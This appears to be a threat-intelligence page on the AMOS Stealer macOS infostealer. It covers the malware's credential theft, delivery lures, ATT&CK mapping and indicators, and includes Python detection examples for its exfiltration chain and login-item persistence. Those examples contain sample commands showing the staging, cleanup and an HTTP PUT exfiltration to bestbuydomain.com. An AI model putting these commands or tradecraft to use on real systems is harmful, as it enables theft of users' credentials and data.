Mallory

Amos Stealer

AMOS Stealer is a macOS-focused information stealer. The content describes it as a prominent and highly active malware family, commonly sold as malware-as-a-service through Telegram and underground forums, and used in financially motivated campaigns. It steals browser passwords, session cookies, and autofill data from browsers including Google Chrome and Microsoft Edge on macOS, copies the macOS Keychain database file login.keychain-db to access saved credentials, and searches the user home directory for sensitive files such as .kube, .ssh, .zshrc, and .gitconfig.

Observed tradecraft includes use of native macOS utilities such as curl, zsh, AppleScript, ditto, and OpenSSL to download payloads, collect data, compress it into /tmp/osalogging.zip, split archives into 10 MB chunks, generate upload session IDs, exfiltrate data via HTTP PUT, retry failed uploads, and remove artifacts such as /tmp/osalogging.zip and /tmp/sync after successful theft. One reported exfiltration destination was the attacker-controlled domain bestbuydomain.com.

The malware has been distributed through deceptive software downloads, fake websites, social-engineering lures, cracked apps, malvertising, compromised websites, fake GitHub repository download links, AI-platform abuse, and ClickFix-style lures. Specific delivery contexts in the content include ClearFake campaigns on compromised websites, Bash-based ClickFix lures, malicious OpenClaw/ClawHub skills that used a base64-encoded command to connect to 91.92.242[.]30 and download the payload, and SEO-poisoned or AI-poisoned search results leading users to malicious ChatGPT and Grok conversations or LLM-written tutorials that trick victims into executing malicious macOS Terminal commands.

The content also states that AMOS Stealer uses macOS Login Items persistence via the com.apple.loginwindow AutoLaunchedApplicationDictionary mechanism.
Infrastructure references in the content include 91.92.242[.]30, bestbuydomain.com, and domains systellis.com and wusetail.com. The malware has been observed alongside or within broader ecosystems involving ClearFake, ShadowSyndicate-linked infrastructure, and neighboring hosting associated with Rhadamanthys, DCRat, HijackLoader, Lumma, Vidar, and other malware families. The described impact includes credential theft, persistent malware infection, data exfiltration, exposure of corporate credentials, and potential data breaches and financial theft.
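The staging, chunking, HTTP PUT exfiltration and cleanup chain described above can be hunted as a sequence rather than as single commands. The following is an added example written for this page, not Mallory's own detection logic or a vendor rule: it runs constructed process-start events (user, command line) through one regex per stage and flags a user only when several stages co-occur, since a lone ditto or curl is routine on a developer Mac.

```python
import re
from collections import defaultdict

# One regex per stage of the chain: archive into /tmp, 10 MB chunks, HTTP PUT
# via curl, and removal of the archive and staging directory. Written for this
# example, not taken from a vendor signature.
STAGES = {
    "stage_archive":   re.compile(r"\bditto\b.*/tmp/\S+\.zip"),
    "stage_chunk":     re.compile(r"\bsplit\b.*-b\s*10[mM]\b"),
    "exfil_http_put":  re.compile(r"\bcurl\b.*(?:-X\s*PUT|--upload-file|-T\s)"),
    "cleanup_archive": re.compile(r"\brm\b.*/tmp/osalogging\.zip"),
    "cleanup_staging": re.compile(r"\brm\b.*-rf?\s+/tmp/sync\b"),
}

# Constructed events (user, command line) as an EDR or the macOS unified log
# might record them; not real telemetry. The session id is a placeholder.
# The last two are benign admin activity that touches ditto and curl.
SAMPLE_EVENTS = [
    ("alice", "/usr/bin/ditto -c -k /tmp/sync /tmp/osalogging.zip"),
    ("alice", "/usr/bin/split -b 10m /tmp/osalogging.zip /tmp/sync/part_"),
    ("alice", "/usr/bin/curl -X PUT --data-binary @/tmp/sync/part_aa "
              "http://bestbuydomain.com/SESSION_ID_PLACEHOLDER"),
    ("alice", "rm -f /tmp/osalogging.zip"),
    ("alice", "rm -rf /tmp/sync"),
    ("bob",   "/usr/bin/ditto -c -k ~/Documents/report /tmp/report.zip"),
    ("bob",   "/usr/bin/curl -T backup.tgz https://backup.example.org/"),
]


def classify_events(events):
    """Map each user to the (stage, command) pairs their commands matched."""
    hits = defaultdict(list)
    for user, cmd in events:
        for stage, pattern in STAGES.items():
            if pattern.search(cmd):
                hits[user].append((stage, cmd))
    return dict(hits)


def flag_users(events, min_stages=3):
    """Flag a user only when their commands cover min_stages distinct stages:
    a lone ditto or curl is routine, the staging-to-cleanup chain is not."""
    flagged = {}
    for user, pairs in classify_events(events).items():
        stages = sorted({stage for stage, _ in pairs})
        if len(stages) >= min_stages:
            flagged[user] = stages
    return flagged


if __name__ == "__main__":
    for user, stages in flag_users(SAMPLE_EVENTS).items():
        print(f"{user}: {', '.join(stages)}")
```

Lowering min_stages to 2 would also flag bob, which is the usual tuning trade-off between catching a partial chain and paging on ordinary backups.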

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

MITRE ATT&CK

Techniques & procedures

23 distinct techniques documented for this family, organized by ATT&CK tactic.

Resource Development

2 techniques
T1583 Acquire Infrastructure (evidence: 1)

Shown above: Malicious ad leading to page for AMOS Stealer.

T1583.006 Web Services (evidence: 2)

"EU/EEA-focused malvertising was observed... Targets users searching for developer tools"

Initial Access

2 techniques
T1189 Drive-by Compromise (evidence: 1)

ClearFake is a malicious JavaScript framework deployed on compromised websites to deliver malware through the drive-by download technique.

T1195 Supply Chain Compromise (evidence: 2)

An active malware distribution campaign abusing two prominent AI platforms, Hugging Face and ClawHub, to deliver trojans, cryptominers, and infostealers disguised as legitimate AI tools and agent extensions. The campaign marks a significant evolution in supply chain attacks, shifting from traditional software repositories to trusted AI ecosystems.

Execution

5 techniques
T1059 Command and Scripting Interpreter (evidence: 1)

Shown above: Text from the fake Brew page pasted into a terminal Window.

T1059.002 AppleScript (evidence: 2)

Once the script is downloaded, it automatically launches an AppleScript command using the zsh terminal shell to begin collecting data.

T1059.004 Unix Shell (evidence: 2)

Once the script is downloaded, it automatically launches an AppleScript command using the zsh terminal shell to begin collecting data.

T1204 User Execution (evidence: 1)

"Victims ... downloaded the installer from the altered link. On Windows systems, this resulted in the execution of malware including HijackLoader, while on macOS systems, it led to infection with AMOS Stealer."

T1204.002 Malicious File (evidence: 1)

When users install these packages without verifying, malicious payloads can be executed automatically, potentially installing malware.

Persistence

1 technique
T1547.015 Login Items (evidence: 1)

macOS maintains a list of applications that should be automatically opened when a user logs in. This list is stored in the com.apple.loginwindow preferences domain under the key AutoLaunchedApplicationDictionary ... it is the programmatic equivalent of a user manually adding an app to their “Login Items” in System Settings.

Privilege Escalation

1 technique
T1547.015 Login Items (evidence: 1)

macOS maintains a list of applications that should be automatically opened when a user logs in. This list is stored in the com.apple.loginwindow preferences domain under the key AutoLaunchedApplicationDictionary ... it is the programmatic equivalent of a user manually adding an app to their “Login Items” in System Settings.
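Both the Persistence and Privilege Escalation entries above rest on the same mechanism, so one check covers them: enumerate AutoLaunchedApplicationDictionary and report entries that do not look like a user-chosen app. This is an added example for this page, not Mallory's code; the entry layout (an array of dicts with "Path" and "Hide" keys) and the trusted directory list are assumptions taken from public macOS persistence research, and the plist content is constructed.

```python
import plistlib

# Constructed com.apple.loginwindow.plist content, not taken from a real host.
# The entry layout ("Path" and "Hide" per dict) is an assumption from public
# persistence research; the page itself only names the key.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>AutoLaunchedApplicationDictionary</key>
  <array>
    <dict>
      <key>Path</key><string>/Applications/Slack.app</string>
      <key>Hide</key><false/>
    </dict>
    <dict>
      <key>Path</key><string>/Users/alice/.config/.sync/Helper.app</string>
      <key>Hide</key><true/>
    </dict>
  </array>
</dict>
</plist>"""

# Directories from which an auto-launched app is unremarkable (assumed baseline);
# a login item pointing anywhere else deserves a look.
TRUSTED_PREFIXES = ("/Applications/", "/System/", "/Library/")


def login_items(plist_bytes):
    """Return the raw AutoLaunchedApplicationDictionary entries (empty if absent)."""
    return plistlib.loads(plist_bytes).get("AutoLaunchedApplicationDictionary", [])


def suspicious_login_items(plist_bytes):
    """Return [(path, [reasons])] for entries that look like malware persistence."""
    findings = []
    for item in login_items(plist_bytes):
        path = str(item.get("Path", ""))
        reasons = []
        if not path.startswith(TRUSTED_PREFIXES):
            reasons.append("path outside trusted application directories")
        if "/." in path:
            reasons.append("hidden (dot) directory in path")
        if bool(item.get("Hide", False)):
            reasons.append("Hide flag set, so it starts without a visible window")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in suspicious_login_items(SAMPLE_PLIST):
        print(path, "->", "; ".join(reasons))
```

On a live host the same function takes the bytes of each user's com.apple.loginwindow.plist under ~/Library/Preferences, which plistlib reads whether the file is stored as XML or binary.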

Stealth

3 techniques
T1027 Obfuscated Files or Information (evidence: 2)

For Windows targets, payloads were detected as trojans packed with VMProtect... A second Windows payload used a 30-byte XOR key to decrypt strings at runtime... The FAKESECURITY campaign used a batch script (CDC1.bat) containing an encoded PowerShell blob...

T1036 Masquerading (evidence: 1)

Shown above: Fake Homebrew (Brew) page.

T1070.004 File Deletion (evidence: 1)

After a successful upload, Amos Stealer runs the cleanup commands (rm -f /tmp/osalogging.zip and rm -rf /tmp/sync) to erase its presence.

Credential Access

3 techniques
T1539 Steal Web Session Cookie (evidence: 1)

It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.

T1555 Credentials from Password Stores (evidence: 1)

Investigation also revealed that the info-stealer copies the macOS Keychain database file, named login.keychain-db, to access saved corporate login details.

T1555.003 Credentials from Web Browsers (evidence: 1)

It then collects stored passwords, session cookies, and autofill form information from Google Chrome and Microsoft Edge browsers.

Collection

3 techniques
T1005 Data from Local System (evidence: 1)

It also searches the user’s home path for confidential developer configuration files and keys, including .kube, .ssh, .zshrc, and .gitconfig.

T1074.001 Local Data Staging (evidence: 1)

the malware uses a native macOS tool called ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder.

T1560 Archive Collected Data (evidence: 1)

the malware uses a native macOS tool called ditto to compress the stolen files into a single archive named osalogging.zip inside the /tmp folder.

Command and Control

2 techniques
T1071 Application Layer Protocol (evidence: 1)

COMMAND AND CONTROL (T1071, T1102) VenomRAT → 178.22.24.175:4449; QuasarRAT → 178.22.24.175:4782; AsyncRAT → 178.22.24.175:2022

T1105 Ingress Tool Transfer (evidence: 3)

Researchers noted that the malware operators use a built-in macOS utility called curl to download the malicious files silently.

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (evidence: 1)

Amos Stealer then sends the data to the attacker-controlled server address (bestbuydomain.com) using an HTTP PUT request via curl.

Other

1 technique
T1656 Impersonation (evidence: 2)

in the latest campaign, the threat actors are distributing the infostealer through deceptive software downloads, fake websites, and social engineering lures.

INDICATORS OF COMPROMISE

IOCs tracked for this family

14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
5 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
3 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
6 tracked

Other indicator types observed in public reporting.

ACTIVITY FEED

Recent activity

22 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching (14)

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping (23)

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.